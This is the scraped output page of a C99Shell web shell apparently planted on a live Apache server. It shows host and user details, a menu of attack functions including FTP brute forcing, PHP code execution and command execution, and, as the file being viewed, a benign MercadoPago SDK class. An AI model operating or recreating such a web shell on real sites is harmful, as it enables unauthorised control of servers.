!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/mercadopago/dx-php/src/MercadoPago/Entities/   drwxr-xr-x
Free 13.22 GB of 57.97 GB (22.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MerchantOrder.php (2.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Merchant Order class file
 */
namespace MercadoPago;

use 
MercadoPago\Annotation\RestMethod;
use 
MercadoPago\Annotation\RequestParam;
use 
MercadoPago\Annotation\Attribute

/**
 * Merchant order class
 * @RestMethod(resource="/merchant_orders/:id", method="read") 
 * @RestMethod(resource="/merchant_orders/", method="create")
 * @RestMethod(resource="/merchant_orders/:id", method="update")
 */

class MerchantOrder extends Entity
{
  
  
/**
   * id
   * @Attribute()
   * @var int
   */
  
protected $id;
  
  
/**
   * preferenceId
   * @Attribute()
   * @var string
   */
  
protected $preferenceId;
  
  
/**
   * dateCreated
   * @Attribute()
   * @var string
   */
  
protected $dateCreated;
  
  
/**
   * lastUpdated
   * @Attribute()
   * @var string
   */
  
protected $lastUpdate;
  
  
/**
   * applicationId
   * @Attribute
   * @var string
   */
  
protected $applicationId;
  
  
/**
   * status
   * @Attribute()
   * @var string
   */
  
protected $status;
  
  
/**
   * siteId
   * @Attribute()
   * @var string
   */
  
protected $siteId;
  
  
/**
   * payer
   * @Attribute()
   * @var object
   */
  
protected $payer;
  
  
/**
   * collector
   * @Attribute()
   * @var object
   */
  
protected $collector;
  
  
/**
   * sponsorId
   * @Attribute()
   * @var int
   */
  
protected $sponsorId;
  
  
/**
   * payments
   * @Attribute()
   * @var array
   */
  
protected $payments;
  
  
/**
   * paidAmount
   * @Attribute()
   * @var float
   */
  
protected $paidAmount;
  
  
/**
   * refundedAmount
   * @Attribute()
   * @var float
   */
  
protected $refundedAmount;
  
  
/**
   * shippingCost
   * @Attribute()
   * @var float
   */
  
protected $shippingCost;
  
  
/**
   * cancelled
   * @Attribute()
   * @var boolean
   */
  
protected $cancelled;
  
  
/**
   * items
   * @Attribute()
   * @var array
   */
  
protected $items;
  
  
/**
   * shipments
   * @Attribute()
   * @var array
   */
  
protected $shipments;
  
  
/**
   * notificationUrl
   * @Attribute()
   * @var string
   */
  
protected $notificationUrl;
  
  
/**
   * additionalInfo
   * @Attribute()
   * @var string
   */
  
protected $additionalInfo;
  
  
/**
   * externalReference
   * @Attribute()
   * @var string
   */
  
protected $externalReference;
  
  
/**
   * marketplace
   * @Attribute()
   * @var string
   */
  
protected $marketplace;
  
  
/**
   * totalAmount
   * @Attribute()
   * @var float
   */
  
protected $totalAmount;
  
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--